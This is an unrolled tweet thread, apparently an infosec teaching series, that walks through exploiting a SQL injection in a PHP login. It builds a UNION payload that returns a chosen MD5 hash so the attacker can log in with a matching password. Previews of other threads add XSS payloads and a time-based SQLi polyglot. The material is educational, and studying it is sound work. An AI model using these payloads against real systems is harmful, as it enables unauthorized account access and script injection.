Rohit Profile picture
Aug 25, 2022 โ€ข 11 tweets โ€ข 6 min read โ€ข Read on X
#Learn365 - Day 6โƒฃ

Can you identify and exploit the #security bug? ๐Ÿค”

In today's thread lets learn about exploit writing ๐Ÿงต๐Ÿ‘‡

#infosec #appsec #bugbountytips #security
This is SQLi. easy to guess. Which field is vulnerable : username.

But the tricky part is how to exploit it.
If you disect the code, you would notice that SQL statement should always return one single word. Otherwise comparison will anyway fail in PHP code.

What next ?
What do you think will happen if I input :

" or 1=1;--

Think first !!
.
.
.
.
.
.
This will make SQL return entire password column.
Inturn, PHP check will fail at line #2.

So, you have to make SQL statement return 1 single word, and that should be password which u can match.
If you want to achieve that, you can not use, generic 1=1 payload.

If you know In SQL there are UNIONS right ? Can we use them ?

Can we use UNION to dump the password which can match the check in PHP ?

I think yes !!
Go on !!
Slight detour, in SQL you can dump whatever you want. You know there is DUAL table ? A dummy table.

SELECT 'sec_r0' from DUAL;

This will dump a single value `sec_r0` in the output.
.
.
.
.
.
Can we use something like this to dump password of our own wish?
Lets see the modified SQL query with UNION stmts

" or 1=1 UNION (SELECT 'sec_r0' from DUAL) ; --

What do you think this would do ?
.
.
.
.
THINK
.
.
.
.
This will dump the entire password col with last value of our own wish, right ?
But we don't want the password col !!
If we dont want password col, can we remove the results of previous table of UNION completely ?

<table1> UNION <table2>

where
table1 output is coming from

SELECT password from USER where username="" or 1=1

and entire table is dumped because of 1=1, what if we negate it?
Yes, that the magic. No see the payload.

" or 1!=1 UNION (SELECT 'sec_r0' from DUAL) ; --

.
.
.
.
THINK
.
.
.
.
This would negate the first table query completely and would only dump 'sec_r0' in output, yes ?

That's the magic of UNION.
Are we done ?

Is this our final exploit ?
.
.
.
.
No
Why ?
Because, PHP is assuming the passwords are stored in MD5. That's why the input password is first MD5ed and then compared.

So guess what would be perfect exploit.
So lets calculate value of MD5 of sec_r0.
MD5(sec_r0) = ccf0d111cd0c1e45708a0aef7b2bcb74

So in payload I would put.
" or 1!=1 UNION (SELECT 'ccf0d111cd0c1e45708a0aef7b2bcb74' from DUAL) ; --

and in input password I would put, sec_r0.

And Bingo.
I will bypass the Auth.
Isnt that amazing ?

Keep this tweet bookmarked. You never know if someone ask you this in an interview.

Also,
If you like the way I explained, consider ๐Ÿ” the thread.
Also, stay tuned(follow @sec_r0 ) for more such interesting threads.

I am running #Learn365 โค๏ธ

โ€ข โ€ข โ€ข

Missing some Tweet in this thread? You can try to force a refresh
ใ€€

Keep Current with Rohit

Rohit Profile picture

Stay in touch and get notified when new unrolls are available from this author!

Read all threads

This Thread may be Removed Anytime!

PDF

Twitter may remove this content at anytime! Save it as PDF for later use!

Try unrolling a thread yourself!

how to unroll video
  1. Follow @ThreadReaderApp to mention us!

  2. From a Twitter thread mention us with a keyword "unroll"
@threadreaderapp unroll

Practice here first or read more on our help page!

More from @sec_r0

May 4, 2023
ChatGPT is a drop of water in ocean of AI.

More than 1K AI tools were launched in past 30 days.
These are 6 of those such amazing AI tools who can save a lot of boring work for you.

#ChatGPT #AI
AgentGPT

Give an Agent a task and it will autonomously do it.

Think of this as Agent doing a missing for you. Image
TripNotes

An AI based travel planner for you. Trust me, if you are traveller like me, this can generate custom experience for you. Image
Read 7 tweets
Dec 26, 2022
You can use ChatGPT for offensive security !!!

Learn in this thread.

#infosec #bugbountytips
Okay, lets ask our intelligent ChatGPT directly !!
Can you help ?
No clue !!
Guessed so.

So here are few points.
1. Ask ChatGPT about port scanning.
2. Ask about specific tool, I have asked about namp.

Now you dont need to use google anymore :P
Read 5 tweets
Sep 21, 2022
#learn365 - Day 3โƒฃ2โƒฃ

10 XSS payloads that don't need parentheses ๐Ÿ˜„

#xss #bugbountytips
1. alert`1`

Use backquotes.
2.
window.name="javascript:alert(2)";
location="xss.html";

location=name
Read 11 tweets
Sep 5, 2022
#Learn365 - Day 1โƒฃ 7โƒฃ

Since we are talking about Polyglots, today I have SQLi Polyglot for you.
A context insensitive sqli payload polyglot, a thread. ๐Ÿงต๐Ÿ‘‡

#infosec #appsec #bugbountytips #security Image
When it comes to SQLi, the SQli polygot is the payload that runs in context of ' (single quote) and " (double quote).

E.g
SLEEP(1) /*' or SLEEP(1) or'" or SLEEP(1) or "*/

Will execute in both the contexts.
How ?

Let's see next.
MYSQL_QUERY = "SELECT * FROM users WHERE username = '<input>'" ;

Would turn into

MYSQL_QUERY = "SELECT * FROM users WHERE username = 'SLEEP(1) /*' or SLEEP(1) or '" or SLEEP(1) or "*/" '";

Carefully observe, the Payload is happy. Image
Read 6 tweets
Sep 4, 2022
#Learn365 - Day 1โƒฃ 6โƒฃ

Can write single Exploit payload which can exploit both HTML and JS injection in this ?

Yes we can, they are POLYGLOT payloads.
A context sensitive injection payloads, a thread. ๐Ÿงต๐Ÿ‘‡

#infosec #appsec #bugbountytips #security Image
Polyglot payloads capable of executing in multiple contexts.

A simple Example:
Input is flowing through HTML and JavaScript contenxt both and HTML is executed first then JS.

If you design the payload with JS context, HTML parse would fail, and XSS wont execute.
Which means you have to design your payload which can pass both the contexts and still execute.

In above case there are two contexts,

HTML
&
JS

First HTML context is executed.

Lets take a look at the payload now.
Read 10 tweets
Aug 24, 2022
#Learn365 - Day 5โƒฃ

CORS Headers. ๐Ÿค”

What are they ? And how they bypass SOP ?

Learn about them in this thread ๐Ÿงต๐Ÿ‘‡

#infosec #bugbountytips #CORS #http
In last thread, we talked about SOP, while SOP blocks the response, CORS is use to bypass SOP the most sensible way.

CORS is Cross Origin Resource Sharing.

It allows sharing response across different origins possible. Can we call it Bypassing SOP ?

Yes.
Lets say,

Domain A wants to Talk to Domain B for getting some information.

A
Read 7 tweets

Did Thread Reader help you today?

Support us! We are indie developers!


This site is made by just two indie developers on a laptop doing marketing, support and development! Read more about the story.

Become a Premium Member ($3/month or $30/year) and get exclusive features!

Become Premium

Don't want to be a Premium member but still want to support us?

Make a small donation by buying us coffee ($5) or help with server cost ($10)

Donate via Paypal

Or Donate anonymously using crypto!

Ethereum

0xfe58350B80634f60Fa6Dc149a72b4DFbc17D341E copy

Bitcoin

3ATGMxNzCUFzxpMCHL5sWSt4DVtS8UqXpi copy

Thank you for your support!

Follow Us!

:(